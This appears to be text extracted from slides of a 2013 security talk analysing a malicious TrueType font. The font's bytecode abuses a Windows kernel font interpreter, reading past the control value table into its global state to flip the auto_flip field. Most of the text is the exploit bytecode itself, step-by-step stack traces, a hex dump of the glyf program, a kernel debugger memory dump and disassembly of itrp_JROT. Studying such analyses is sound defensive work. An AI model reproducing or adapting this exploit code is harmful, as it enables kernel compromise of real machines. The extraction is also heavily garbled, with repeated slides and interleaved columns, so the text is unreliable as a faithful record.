00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Second Operand←0x00000000
(First-Second)→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Second Operand←0x00000000
(Old CVT-New CVT)→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
Push One Byte→0x00000017
(Old CVT-New CVT)→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
(Old CVT-New CVT)↔0x00000000
Push One Byte↔0x00000017
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
If This Is True←0x00000000
Then Jump Relative Offset←0x00000017
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
PUSHB[1]
RS
DUP
PUSHB[1]
SUB
DUP
PUSHB[1]
SUB
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
0
1
1
1
2
3
If This Is True←0x00000000
Then Jump Relative Offset←0x00000017
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Not True, So Falls Through
If This Is True←0x00000000
Push One Byte→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
If This Is True←0x00000000
RS Location←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
If This Is True←0x00000000
RS Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Push One Byte→0x00000001
RS Value→0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Second Operand←0x00000001
First Operand←0x00000000
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Second Operand←0x00000001
(First+Second)→0x00000001
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Duplicate→0x00000001
(First+Second)→0x00000001
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)Push
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
Byte→0x00000000
Duplicate→0x00000001
(First+Second)→0x00000001
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)Duplicate↔0x00000001
Push Byte↔0x00000000
(First+Second)→0x00000001
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
WS Location←0x00000000
(First+Second)→0x00000001
00020: PUSHB[1] 0
00022: RS
00023: PUSHB[1] 1
00025: ADD
00005: FLIPOFF
00026: DUP
00006: PUSHB[1] 0
00027: PUSHB[1] 0
00008: RS
00029: SWAP
00009: RCVT
00030: WS
00010: FLIPON
00031: PUSHB[1] 80 0x50
0 1 2 3PUSHB[1]
4 5 6 7 08 9 10111213141516171819202122232
00011:
00033: SUB
00013:
RS
00034: PUSHW[1] -33
1
00014: RCVT
00037: SWAP
00015: SUB
00038: JROT ;(38-33=5)
00016: PUSHB[1] 23
00018: SWAP
00019: JROT ; (19+23=42) WS Value←0x00000001
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
0
0
WS Location←0x00000000
(First+Second)→0x00000001
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
WS Push Byte→0x00000050
(First+Second)→0x00000001
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
WS Push Byte→0x00000050
Loop Counter→0x00000001
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
WS Second Operand←0x00000050
First Operand←0x00000001
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
WS Second Operand←0x00000050
(0x01-0x50)(-79)→0xffffffb1
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
Push 16-bit Word→0xffffffdf
(0x01-0x50)(-79)→0xffffffb1
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
Friday, March 8, 2013
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
(0x01-0x50)(-79)↔0xffffffb1
Push 16-bit Word↔0xffffffdf
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
If This Is True←0xffffffb1
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
00020: PUSHB[1] 0
00000:
PUSHB[1]
0
; __fastcall itrp_JROT(x, x)
00022: RS
00002:
PUSHB[1] proc
0 near
@itrp_JROT@8
PUSHB[1] 1
mov
edx, 00023:
dword_BF9A9228
00004: WS
push
esi 00025: ADD
esi, 00026:
dword_BF9A9234
00005: FLIPOFF mov
DUP
edi
00006: PUSHB[1] push
0
00027: PUSHB[1] 0
mov
edi, [esi]
00008: RS
SWAP
mov
eax, 00029:
edx
00009: RCVT
WS
sub
eax, 00030:
edi
00010: FLIPON
sar
eax, 00031:
2
PUSHB[1] 80 0x50
eax, 00033:
2
00011: PUSHB[1] cmp
0
SUB
pop
edi
00013: RS
pop
esi 00034: PUSHW[1] -33
00014: RCVT
SWAP
jb
short00037:
loc_BF8D0428
00015: SUB
mov
eax, 00038:
[edx-4] JROT ;(38-33=5)
edx, 4
00016: PUSHB[1] sub
23
sub
edx, 4
00018: SWAP
test
eax, eax
00019: JROT ; (19+23=42)
WS Value←0x00000001
mov
dword_BF9A9228,
edx ;etc...
If This Is True←0xffffffb1
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
WS Value←0x00000001
If This Is True←0xffffffb1
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
Remember, CVT is now 0x80 longer
JROT ; (19+23=42)
WS Value←0x00000001
(not
80.0,
I’m
not
sure
if
this
is
a
bug)
If This Is True←0xffffffb1
So,
only
scan
80*4=320
bytes
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
00000: PUSHB[1]
00002: PUSHB[1]
00004: WS
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
0
0
FLIPOFF
PUSHB[1] 0
RS
RCVT
FLIPON
PUSHB[1] 0
RS
RCVT
SUB
PUSHB[1] 23
SWAP
JROT ; (19+23=42)
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
00039: PUSHB[1] 128
00041: JMPR ;(41+128=169)
WS Value←0x00000001
If This Is True←0xffffffb1
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
00162:
00000:
00164:
00002:
00165:
00004:
00167:
00168:
00169
PUSHB[1]
PUSHB[1]
RS
PUSHB[1]
PUSHB[1]
WS
RS
WCVTP
0
0
00020:
00022:
00023:
00025:
00026:
00027:
00029:
00030:
00031:
00033:
00034:
00037:
00038:
PUSHB[1] 0
RS
PUSHB[1] 1
ADD
DUP
PUSHB[1] 0
SWAP
WS
PUSHB[1] 80 0x50
SUB
PUSHW[1] -33
SWAP
JROT ;(38-33=5)
00039: PUSHB[1] 128
00041: JMPR ;(41+128=169)
WS Value←0x00000001
If This Is True←0xffffffb1
Then Jump Relative Offset←0xffffffdf
Friday, March 8, 2013
GLYF Program
...
00000060
00000070
00000080
...
0003bad0
0003bae0
0003baf0
0003bb00
0003bb10
0003bb20
0003bb30
0003bb40
0003bb50
0003bb60
0003bb70
0003bb80
0003bb90
0003bba0
0003bbb0
0003bbc0
...
Friday, March 8, 2013
00 00 00 00 00 03 ba d0
7f 06 e9 00 00 00 01 0c
18 d3 69 4b 00 03 ba e4
00 00 00 02 66 70 67 6d
00 03 b8 9b 67 6c 79 66
00 00 00 bc 68 65 61 64
|............fpgm|
|............glyf|
|..iK........head|
00
00
00
45
42
b0
42
78
03
00
42
b5
44
00
00
00
00
00
b0
43
78
b0
43
b0
b0
31
03
45
03
00
00
00
|................|
|.^..............|
|......BN..CEM..C|
|Ea..#x..C..` ..#|
|B.Pa...#x.....C |
|..a ..aE..#BE..#|
|BE..#B..C..P\..#|
|x..C..Ca..#x..C.|
|.Ca\.+#x..C..` .|
|.#B.Pa\.1#x....C|
|B....CB....CEB..|
|....C..`E.P`..C#|
|D.....C..CD17...|
|.....f.........f|
|.............f..|
|.........r......|
169 bytes long
00
5e
a9
61
b0
01
45
b0
43
23
b0
1c
b0
00
00
01
00
00
b0
b0
50
61
b0
01
61
42
02
b0
01
00
00
04
00
00
00
17
61
20
03
43
5c
b0
b0
00
1f
08
03
09
00
00
b0
23
b8
b0
23
b0
b0
50
03
43
b0
00
00
00
00
01
00
78
ff
01
42
02
2b
61
43
b0
00
66
01
02
00
00
42
b0
df
61
b0
43
23
5c
42
03
43
00
04
00
00
00
4e
00
23
45
01
61
78
b0
b0
60
b0
03
09
0e
00
00
00
b0
b0
01
b0
0d
00
23
b0
b0
43
01
01
72
00
00
43
01
80
23
00
23
43
78
00
50
44
04
00
00
00
01
45
60
1c
42
50
78
b0
b0
43
60
31
09
0c
03
00
00
4d
20
b0
45
5c
b0
01
01
45
b0
37
00
00
00
00
01
b0
b0
00
b0
b0
01
60
b0
42
00
01
00
66
01
00
00
00
00
43
02
18
43
20
02
b8
43
01
00
00
04
00
01
43
23
20
23
23
b0
b0
43
ff
23
00
66
03
09
CVT
e2481f80 00000000 CVT+4 = Global State
kd> dd e2481f84 L100
e2481f84 e2481afc e2481f00 e2481f80
00030004
[CVT+4]
=
Stack
Base
e2481f94 00040000 00000000 00000000 00000000
e2481fa4 00000000 00000044 00000000 00000000
e2481fb4 00000000 00000000 00000040 bf85c269
e2481fc4 00000003
00000000 00000000 00000000
+0x90: auto_flip
e2481fd4 00030009 00000080 00000001 00000044
e2481fe4 00000000 00000000 00000000 00000000
e2481ff4 00000040 bf85c269 00000003 00000000
e2482004 00000000 00000000 00030009 00010080
e2482014 00000001 e2481f80 e2481f80 00000000
e2482024 00000000 bf85bd4b bf85bd4b e2482368
e2482034 e24bdbb3 0000000d e2482318 0003b89b
e2482044 00000000 00000000 00000000 00000000
e2482054 00000000 00000000 00000000 00000000
CVT+[4*0x25]= [CVT+0x94] = [Global State +0x90]
e2482064 00002000 00000400 00000080 0000000a
e2482074 00002000 00000400 00000080 0000000a
e2482084
00002000State
00000400
00000080 0000000a
CVT=Global
-4
e2482094 00010000 00010000 00000001 00000000
e24820a4 00000000 00000200 00000000 00000001
e24820b4 e2481290 00000081 00040000 00040000
e24820c4 00040000 00040000 00000000 00000001
e24820d4 00002710 00000064 00989680 e1c5d4b0
Friday, March 8, 2013
CVT+[4*0x25]= [CVT+0x94] = [Global State +0x90]= auto_flip
00005:
00006:
00008:
00009:
00010:
00011:
00013:
00014:
00015:
00016:
00018:
00019:
...
00042:
00044:
00045:
00046:
Friday, March 8, 2013
FLIPOFF
PUSHB[1]
RS
RCVT
FLIPON
PUSHB[1]
RS
RCVT
SUB
PUSHB[1]
SWAP
JROT
PUSHB[1]
RS
DUP
PUSHB[1]
0
0
23
; (19+23=42)
0
1
This is true when RCVT loop
reaches 0x25
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
Friday, March 8, 2013
PUSHB[1]
RS
DUP
PUSHB[1]
SUB
DUP
PUSHB[1]
SUB
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
0
1
1
1
2
3
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
Friday, March 8, 2013
PUSHB[1]
RS
DUP
PUSHB[1]
SUB
DUP
PUSHB[1]
SUB
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
0
1
1
1
2
3
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
Stores DWORD
from +0x26
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
Friday, March 8, 2013
PUSHB[1]
RS
DUP
PUSHB[1]
SUB
DUP
PUSHB[1]
SUB
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
0
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
2
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
Storage element
2
00090:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
3
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
1
1
1
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
Friday, March 8, 2013
PUSHB[1]
RS
DUP
PUSHB[1]
SUB
DUP
PUSHB[1]
SUB
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
RCVT
PUSHB[1]
SWAP
WS
0
1
1
1
2
3
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
00079:
00081:
00082:
00084:
00085:
00086:
00088:
00089:
PUSHB[1] 1
RS
PUSHB[1] 2
RS
SUB
PUSHB[1] 13
SWAP
JROT
00090:
00092:
00093:
00095:
00096:
00097:
00098:
00100:
PUSHB[1] 1
RS
PUSHB[1] 3
RS
SUB
NOT
PUSHB[1] 43
SWAP
Storage element 3
00042:
00044:
00045:
00046:
00048:
00049:
00050:
00052:
00053:
00054:
00056:
00057:
00058:
00059:
00061:
00062:
00063:
00064:
00066:
00067:
Friday, March 8, 2013
PUSHB[1] 0
RS
DUP
PUSHB[1] 1
SUB
DUP
e2481f80 00000000
kd> dd e2481f84
PUSHB[1]
1 L100
e2481f84 e2481afc e2481f00
SUB
e2481f94 00040000 00000000
RCVT
e2481fa4 00000000 00000044
e2481fb4 00000000
00000000
PUSHB[1]
1
e2481fc4 00000003 00000000
SWAP
e2481fd4 00030009 00000080
WS
e2481fe4 00000000 00000000
RCVT
e2481ff4 00000040 bf85c269
e2482004 00000000
00000000
PUSHB[1]
2
e2482014 00000001 e2481f80
SWAP
e2482024 00000000 bf85bd4b
WS
e2482034 e24bdbb3 0000000d
e2482044 00000000 00000000
RCVT
+0x25 00000000
e2482054 00000000
+0x26
PUSHB[1]
3
e2482064 00002000 00000400
SWAP
e2482074 00002000 00000400
e2482084 00002000 00000400
WS
e2482094
00068:
00070:
00071:
00073:
00074:
00075:
00077:
00078:
PUSHB[1] 1
RS ; e2481f80
PUSHB[1] 0
LT ; 1
NOT
PUSHB[1] 24
SWAP
JROT ;(78+24=102)
e2481f80
00030004
00079:
PUSHB[1]
00000000
00000000
00081:
RS
00000000
00000000
00082:
PUSHB[1]
00000040
bf85c269
00084:
RS
00000000
00000000
00085:
SUB
00000001
00000044
00086:
PUSHB[1]
00000000
00000000
00088:
SWAP
00000003
00000000
00089:
JROT
00030009 00010080
e2481f80
00000000
00090:
PUSHB[1]
bf85bd4b
e2482368
00092:
RS
e2482318
0003b89b
00093:
PUSHB[1]
00000000
00000000
00095:
RS
00000000
00000000
00096:
SUB
00000080
0000000a
00097:
NOT
00000080
0000000a
00098:
PUSHB[1]
00000080
0000000a
00100:
SWAP
00010000 00010000 00000001 00000000
1
2
13
1
3
43
00101: JROT
00102:
00104:
00105:
00107:
